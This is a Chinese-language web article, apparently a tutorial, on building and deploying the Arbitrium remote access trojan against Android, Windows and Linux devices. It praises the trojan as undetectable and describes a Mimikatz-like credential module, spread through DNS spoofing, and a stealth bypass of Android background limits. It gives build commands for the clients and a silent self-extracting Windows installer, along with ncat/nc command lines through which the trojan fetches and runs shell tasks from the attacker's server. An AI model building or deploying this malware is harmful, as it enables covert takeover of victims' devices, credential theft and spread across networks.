您好,登录后才能下订单哦!
这篇文章主要介绍怎么使用Arbitrium-RAT向Android、Windows和Linux植入远程访问木马,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!
Arbitrium是一款跨平台并且完全无法被检测到的远程访问木马,可以帮助广大研究人员控制Android、Windows和Linux操作系统,而且完全不需要配置任何额外的防火墙规则或端口转发规则。该工具可以提供本地网络的访问权,我们可以将目标设备当作一个HTTP代理来使用,并访问目标网络中的路由器、发现本地IP或扫描目标端口等等。
Arbitrium还自带了类似Mimikatz的模块,而且支持广大研究人员添加自定义模块。除此之外,如果将Arbitrium配合一款DNS欺骗软件一起使用的话,就可以实现在目标网络设备之间实现木马后门的自动传播。Arbitrium是一个由多个部分组成的项目,并且使用了Java、JS、C、Python、Cordova和VueJS等多种编程语言进行开发。
客户端使用了简单的工具,这将允许Arbitrium完全无法被检测到。木马基于netcat通信,该组件主要负责通过管道处理TCP通信数据并运行服务器端发送过来的命令。
Arbitrium不需要向防火墙添加任何的排除规则或端口转发规则,服务器端是一个带有API的终端节点,负责针对目标主机和其他设备的任务接收,因为木马每隔一段时间就会定期向服务器请求新的控制指令。这里的控制命令可以是一个JavaScript文件(Android应用使用的是Cordova)或可以在命令行终端中运行的Shell文件。当服务器端接收到目标设备的任务之后,前者将设置一个计划任务,然后开启一个子进程监听一个专用的临时端口并等待木马后门的响应。因此,我们的木马程序并不需要监听任何的端口。
跟普通Android操作系统不同的是,小米的MIUI、华为的EMUI或三星的Android Pie等定制产品忽略了用户对应用程序的权限/例外。因此,如果你尝试在后台运行Android端木马后门,当应用程序开始运行频繁或繁重(有时甚至是轻量级)任务(例如:定期发送HTTP请求)时,无论用户授予什么权限,它都会被终止运行,而且操作系统完全忽略当前的配置。
上面提到的这个问题非常烦人,但经过一段时间的研究后我发现,我们可以通过构建一个轻量级的二进制文件,在后台继续运行分配的任务,而MainActivity在启动二进制文件之后就不会有什么动静了,这样可以帮助我们绕过绝大多数限制,而且还可以提高应用程序的性能。
MainActivity从服务器接收一个JS文件,并使用ThreadPoolExecutor启动二进制文件,而无需挂起二进制文件以使其退出(有关此StealthMode/BatteryBypass的详细信息)。
该工具还提供了一个控制面板,这个Web接口只是一个可选项,并非必须的。这是一个简单的VueJS Web应用程序,即一个可以帮助我们控制目标的UI界面,而不用通过给API发送命令请求来实现控制。【点我】访问Arbitrium WebApp。
Java ver ... Cordova Android SDK & NDK
Python3.6 (或更新版本) PyInquirer Winrar (Windows only)
注意:需要使用setAPI_FQDN.sh设置所有文件中的服务器域名/IP地址。
使用下列命令将该项目源码克隆至本地:
git clone https://github.com/BenChaliah/Arbitrium-RAT.git --recursive
$ cd ArbitriumClients/AndroidApp/ClientApp/ $ cordova build android $ cd ../StealthMode/ $ make clean && make build
$ cd ArbitriumClients\WindowsApp $ pyinstaller --onefile runFrame.py $ copy Client_tools\toolbox.exe dist\ $ copy Client_tools\SFXAutoInstaller.conf dist\ $ copy Client_tools\start_script.vbs dist\ $ cd dist $ {Rar_abspath} a -r -cfg -sfx -z"SFXAutoInstaller.conf" Standalone.exe
$ pip install flask flask_cors && ./runserver.sh # Python2.7
├── runserver.sh ├── main.py ├── reverse_http.py ├── initProxy.py │ ├── assets (src: ArbitriumClients/AndroidApp/StealthMode) │ ├── runFrame_arm64-v8a │ ├── toolbox_arm64-v8a │ ├── ... (x86, x86_64, armeabi-v7a) │ │ ├── JS_scripts │ ├── checkupdate.js │ ├── init.js │ ├── runshell.js │ └── StealthMode.js │ ├── misc │ ├── modules │ ├── discover.py │ ├── mimikatz.py │ ├── ports.py │ └── runCMD.py │ └── threads
[GET] /checkupdate.js
样例:假设你想要将目标以HTTP代理来使用,API会将请求构建为下列命令:
echo -e "GET / HTTP/1.1\r\nHost: 192.168.1.1\r\nConnection: close\r\n\r\n" | {abspath_toolbox/ncat} {API_HOST_IP} {lport} -w 10;\r\n
然后将其存储至assets/runsh_{uid_task}.sh中,/checkupdate.js会让木马下载并执行shell文件:
>>> Popen("exec $(nc -l 0.0.0.0 -p {lport} -dN > {task_filename})" shell=True, close_fds=True, ...)
以上是“怎么使用Arbitrium-RAT向Android、Windows和Linux植入远程访问木马”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注亿速云行业资讯频道!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。